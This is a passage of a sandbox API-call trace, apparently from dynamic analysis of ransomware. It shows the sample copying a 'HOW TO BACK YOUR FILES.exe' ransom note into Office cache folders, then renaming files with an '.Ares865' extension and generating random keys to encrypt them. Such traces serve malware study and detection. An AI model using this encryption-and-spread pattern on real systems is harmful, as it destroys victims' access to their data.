Users\\{91140000-0057-0000-1000-0000000FF1CE}-C" [0077.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08d0 | out: hHeap=0x2b0000) returned 1 [0077.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0077.649] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned 62 [0077.649] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C" [0077.649] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.649] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.654] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.654] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5fcb3000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fcb3000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.654] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.654] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.654] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865") returned 85 [0077.654] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.ares865"), dwFlags=0x1) returned 1 [0077.657] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0077.657] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4274) returned 1 [0077.657] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0958) returned 1 [0077.658] CryptGenRandom (in: hProv=0x2f0958, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.658] CryptReleaseContext (hProv=0x2f0958, dwFlags=0x0) returned 1 [0077.661] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0958) returned 1 [0077.661] CryptGenRandom (in: hProv=0x2f0958, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.661] CryptReleaseContext (hProv=0x2f0958, dwFlags=0x0) returned 1 [0077.662] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0077.662] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0077.663] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0077.663] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=20577) returned 1 [0077.663] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0958) returned 1 [0077.664] CryptGenRandom (in: hProv=0x2f0958, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.664] CryptReleaseContext (hProv=0x2f0958, dwFlags=0x0) returned 1 [0077.667] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0958) returned 1 [0077.667] CryptGenRandom (in: hProv=0x2f0958, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.667] CryptReleaseContext (hProv=0x2f0958, dwFlags=0x0) returned 1 [0077.668] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.Ares865") returned 83 [0077.668] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.ares865"), dwFlags=0x1) returned 1 [0077.669] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0077.669] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8723) returned 1 [0077.669] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0958) returned 1 [0077.670] CryptGenRandom (in: hProv=0x2f0958, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.670] CryptReleaseContext (hProv=0x2f0958, dwFlags=0x0) returned 1 [0077.672] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0958) returned 1 [0077.673] CryptGenRandom (in: hProv=0x2f0958, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.673] CryptReleaseContext (hProv=0x2f0958, dwFlags=0x0) returned 1 [0077.673] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C" [0077.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0848 | out: hHeap=0x2b0000) returned 1 [0077.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0077.673] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned 62 [0077.673] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C" [0077.673] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.673] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.678] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x5fcd9160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fcd9160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.678] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.678] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.678] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865") returned 85 [0077.678] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.ares865"), dwFlags=0x1) returned 1 [0077.679] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.679] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4274) returned 1 [0077.679] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f08d0) returned 1 [0077.680] CryptGenRandom (in: hProv=0x2f08d0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.680] CryptReleaseContext (hProv=0x2f08d0, dwFlags=0x0) returned 1 [0077.682] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f08d0) returned 1 [0077.682] CryptGenRandom (in: hProv=0x2f08d0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.682] CryptReleaseContext (hProv=0x2f08d0, dwFlags=0x0) returned 1 [0077.683] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.Ares865") returned 84 [0077.683] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.ares865"), dwFlags=0x1) returned 1 [0077.684] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.684] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6421) returned 1 [0077.685] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f08d0) returned 1 [0077.685] CryptGenRandom (in: hProv=0x2f08d0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.685] CryptReleaseContext (hProv=0x2f08d0, dwFlags=0x0) returned 1 [0077.688] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f08d0) returned 1 [0077.688] CryptGenRandom (in: hProv=0x2f08d0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.688] CryptReleaseContext (hProv=0x2f08d0, dwFlags=0x0) returned 1 [0077.689] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0077.689] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0077.690] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.690] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16683) returned 1 [0077.690] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f08d0) returned 1 [0077.690] CryptGenRandom (in: hProv=0x2f08d0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.691] CryptReleaseContext (hProv=0x2f08d0, dwFlags=0x0) returned 1 [0077.693] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f08d0) returned 1 [0077.694] CryptGenRandom (in: hProv=0x2f08d0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.694] CryptReleaseContext (hProv=0x2f08d0, dwFlags=0x0) returned 1 [0077.694] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C" [0077.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0077.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0077.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned 62 [0077.695] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C" [0077.695] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.695] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.699] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fcff2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fcff2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.700] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.700] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.700] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865") returned 85 [0077.700] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.ares865"), dwFlags=0x1) returned 1 [0077.700] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0077.700] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4274) returned 1 [0077.701] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0848) returned 1 [0077.701] CryptGenRandom (in: hProv=0x2f0848, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.701] CryptReleaseContext (hProv=0x2f0848, dwFlags=0x0) returned 1 [0077.703] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0848) returned 1 [0077.704] CryptGenRandom (in: hProv=0x2f0848, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.704] CryptReleaseContext (hProv=0x2f0848, dwFlags=0x0) returned 1 [0077.705] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.Ares865") returned 85 [0077.705] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.ares865"), dwFlags=0x1) returned 1 [0077.706] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0077.706] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16852) returned 1 [0077.706] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0848) returned 1 [0077.707] CryptGenRandom (in: hProv=0x2f0848, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.707] CryptReleaseContext (hProv=0x2f0848, dwFlags=0x0) returned 1 [0077.712] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0848) returned 1 [0077.713] CryptGenRandom (in: hProv=0x2f0848, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.713] CryptReleaseContext (hProv=0x2f0848, dwFlags=0x0) returned 1 [0077.713] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0077.713] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0077.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0077.714] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=31094) returned 1 [0077.715] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0848) returned 1 [0077.715] CryptGenRandom (in: hProv=0x2f0848, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.715] CryptReleaseContext (hProv=0x2f0848, dwFlags=0x0) returned 1 [0077.718] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0848) returned 1 [0077.719] CryptGenRandom (in: hProv=0x2f0848, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.719] CryptReleaseContext (hProv=0x2f0848, dwFlags=0x0) returned 1 [0077.720] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C" [0077.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f06b0 | out: hHeap=0x2b0000) returned 1 [0077.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0077.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned 62 [0077.720] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C" [0077.720] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.720] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.724] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.724] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All 